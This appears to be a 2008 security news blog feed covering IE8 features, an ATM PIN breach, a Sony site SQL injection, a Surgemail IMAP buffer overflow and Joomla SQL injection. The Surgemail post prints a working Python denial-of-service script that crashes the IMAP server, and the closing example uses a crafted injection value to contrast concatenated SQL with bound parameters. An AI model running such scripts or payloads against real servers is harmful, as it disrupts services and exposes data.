UniHacker Feed

IE8: Internet Explorer 8 Download, more secure?

July 3rd, 2008

Microsoft says it is beefing up its upcoming Internet Explorer 8 (IE8). Cross-site scripting, malware, and read-only file upload paths are a few highlights of the upcoming browser, which aims to be more secure. Microsoft is also integrating its malware protection into Internet Explorer 8 by checking third-party sites that contain databases of known malicious websites. Suspicious URLs will show in gray while good addresses will show in black, helping users know whether they are on a bad site or not.


Internet Explorer 8 can be downloaded here.

Hackers crack ATM networks.

July 3rd, 2008

Hackers gained access to PIN codes from ATM machines in 7-Eleven stores. They stole identities, PIN numbers and a lot of cash. A closely guarded ATM security tool has revealed a large hole in the ATM network. On top of that, many of the ATM networks around the United States are built on the Windows operating system, making them even more vulnerable. PIN numbers have very weak encryption, leaking partial keys similar to Wi-Fi leaks.

Citibank has about 5,700 Citibank-branded ATM machines installed in 7-Eleven stores throughout the U.S., but Citibank does not own any of the ATMs.

The ATM was hacked through a third-party server at a data processing center.

Sony Playstation site hacked by SQL Injection

July 2nd, 2008

And the SQL Injection pwns another website. Sony’s PS3 website was hacked via an SQL Injection exploit, imagine that. The hackers created a pop-up message saying that your computer is infected and then linked you to a page where you could purchase some software to clean it up. Most likely the software you purchase from these hackers would only turn your computer into a zombie. Zombies are hidden processes that are awakened when a master gives them commands. They do various tasks, including massive Distributed Denial of Service attacks and other brute-force hacking tasks. Let’s not forget malware: fake anti-virus software can also scan your hard drive for personal information.

“There are millions of video game lovers around the world, many of whom will visit Sony’s PlayStation website regularly to find out more about the latest console games,” said Graham Cluley, senior technology consultant at Sophos.

Surgemail - IMAP Denial of Service

July 1st, 2008

The IMAP service in Surgemail contains a remote buffer overflow problem in the APPEND command. The server can be remotely shut down by issuing a sequence of commands. Keep in mind that this is post-authentication, meaning that you’ll need an account to actually exploit this bug.

Code as follows:

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = '\x41' * 3000

s.connect(('192.168.0.103',143))
s.recv(1024)
s.send('A001 LOGIN user@test.com user ' + buffer + '\r\n')
s.recv(1024)
s.send('A001 APPEND ' + buffer + '\r\n')
s.recv(1024)
s.close()

Joomla components have serious SQL injection issues.

June 30th, 2008

Recently I’ve been noticing a number of Joomla components with SQL injection issues. These components are not part of the base platform of Joomla, but they can put your system at risk if you don’t know about the issues. Joomla developers need to build their own data management protocol for their software so that component developers aren’t running pure SQL statements. This could greatly cut down on the SQL injection issue Joomla is facing.

SQL Injection allows a hacker to run SQL statements by modifying POST or GET queries, allowing the changing or removal of data from databases.
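To show what a data layer buys over "pure SQL statements" in a component, here is an added example (not Joomla code and not from the original post). The table, the ItemStore class and all names in it are hypothetical, and the data is constructed; it uses Python's sqlite3 so it runs offline.

```python
import sqlite3

def make_db():
    """Constructed in-memory table standing in for a component's data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    db.executemany("INSERT INTO items VALUES (?, ?, ?)",
                   [(1, "Public post", 1), (2, "Draft post", 0), (3, "Another public post", 1)])
    return db

def get_item_concatenated(db, item_id):
    """Component-style code: the request value is pasted into the SQL text,
    so whatever the client sends is parsed as part of the statement."""
    sql = ("SELECT title FROM items WHERE published = 1 AND id = "
           + item_id + " ORDER BY id")
    return [row[0] for row in db.execute(sql)]

class ItemStore:
    """Hypothetical data layer: callers pass values, never SQL text."""
    _COLUMNS = {"id", "title", "published"}  # allow-list; identifiers cannot be bound

    def __init__(self, db):
        self._db = db

    def find(self, **filters):
        # Column names come from code, but check them anyway so a
        # request-controlled key can never reach the SQL text.
        unknown = set(filters) - self._COLUMNS
        if unknown:
            raise ValueError(f"unknown column(s): {sorted(unknown)}")
        where = " AND ".join(f"{col} = ?" for col in filters) or "1"
        sql = f"SELECT title FROM items WHERE {where} ORDER BY id"
        # Values travel as bound parameters and are compared as data only.
        return [row[0] for row in self._db.execute(sql, tuple(filters.values()))]

if __name__ == "__main__":
    db = make_db()
    crafted = "2 OR 1=1"  # constructed request value
    print("concatenated:", get_item_concatenated(db, crafted))  # unpublished draft leaks
    print("data layer:  ", ItemStore(db).find(published=1, id=crafted))  # no rows
```

With the concatenated query the crafted value rewrites the WHERE clause and the unpublished row comes back; through the data layer the same string is just a value that matches no id.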